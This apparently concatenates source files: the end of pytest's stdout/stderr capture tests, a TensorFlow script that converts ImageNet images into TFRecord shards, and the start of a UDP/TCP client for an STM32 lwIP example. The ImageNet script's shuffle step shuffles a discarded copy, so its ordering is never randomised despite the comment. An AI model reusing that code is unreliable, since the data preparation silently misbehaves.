pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd) -> None:
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self) -> None:
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self) -> None:
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self) -> None:
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self) -> None:
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self) -> None:
with self.getcapture() as cap:
print("hxฤ
ฤ")
out, err = cap.readouterr()
assert out == "hxฤ
ฤ\n"
def test_reset_twice_error(self) -> None:
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self) -> None:
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self) -> None:
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self) -> None:
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self) -> None:
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self) -> None:
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self) -> None:
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self) -> None:
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = pytester.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = pytester.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, pytester: Pytester) -> None:
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, pytester: Pytester) -> None:
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset() -> None:
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(
capsys: CaptureFixture[str],
) -> None:
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys: CaptureFixture[str]) -> None:
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(pytester: Pytester) -> None:
pytester.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = pytester.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(pytester: Pytester, method: str) -> None:
# here we check a fundamental feature
p = pytester.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = pytester.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(pytester: Pytester) -> None:
pytester.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = pytester.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"),
reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(pytester: Pytester) -> None:
pytester.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = pytester.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(
pytester: Pytester, monkeypatch: MonkeyPatch
) -> None:
p = pytester.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = pytester.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(pytester: Pytester) -> None:
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
pytester.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
pytester.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = pytester.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(
pytester: Pytester, capture_fixture: CaptureFixture[str]
) -> None:
# Issue 3819
# capture should work with live cli logging
pytester.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = pytester.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(pytester: Pytester) -> None:
"""It should behave the same with and without output capturing (#4861)."""
p = pytester.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = pytester.runpytest("-s", str(p))
result_with_capture = pytester.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys: CaptureFixture[str]) -> None:
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"]) # type: ignore[list-item]
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(pytester: Pytester) -> None:
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = pytester.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = pytester.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
tf.compat.v1.app.flags.DEFINE_string('raw_directory', None,
'Raw data directory')
tf.compat.v1.app.flags.DEFINE_string('output_directory', None,
'Output data directory')
tf.compat.v1.app.flags.DEFINE_integer('shards', 1,
'Number of shards in TFRecord files.')
tf.compat.v1.app.flags.DEFINE_string('subset', 'validation',
'Subset of imagenet, can be validation/train')
tf.compat.v1.app.flags.DEFINE_integer('num_threads', 1,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.compat.v1.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.compat.v1.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
FLAGS = tf.compat.v1.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = b'RGB'
channels = 3
image_format = b'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(bytes(synset,'utf-8')),
'image/class/text': _bytes_feature(bytes(human,'utf-8')),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(bytes(os.path.basename(filename),'utf-8')),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.compat.v1.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.compat.v1.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.compat.v1.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.compat.v1.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.io.gfile.GFile(filename, 'rb').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int) # HERE
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label, synset, human, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.compat.v1.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.io.gfile.glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(list(range(len(shuffled_index))))
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _process_dataset(name, directory, num_shards, synset_to_human):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
_process_image_files(name, filenames, synsets, labels,
humans, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.compat.v1.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def main(unused_argv):
assert not FLAGS.shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
if(FLAGS.raw_directory != None):
_process_dataset(FLAGS.subset, FLAGS.raw_directory,FLAGS.shards, synset_to_human)
if __name__ == '__main__':
tf.compat.v1.app.run()
|
main.py | #!/usr/bin/env python3
import threading
from socket import AF_INET, SOCK_DGRAM, SOCK_STREAM, socket, SHUT_WR
import config
from config import SERVER_ADDRESS, SERVER_PORT
from definitions import AnsiColors
from utility import print_protected
if config.TCPIP_PROT == config.Protocols.TCPIP_PROT_1_UDP:
CLIENT_SOCKET = socket(AF_INET, SOCK_DGRAM)
PROTOCOL_STRING = "UDP"
else:
CLIENT_SOCKET = socket(AF_INET, SOCK_STREAM)
PROTOCOL_STRING = "TCP"
BUFFER_SIZE = 1500
def main():
print(f"TCP/IP client for the STM32 lwIP RTEMS example")
sender = threading.Thread(target=sender_thread, args=(None,))
listener = None
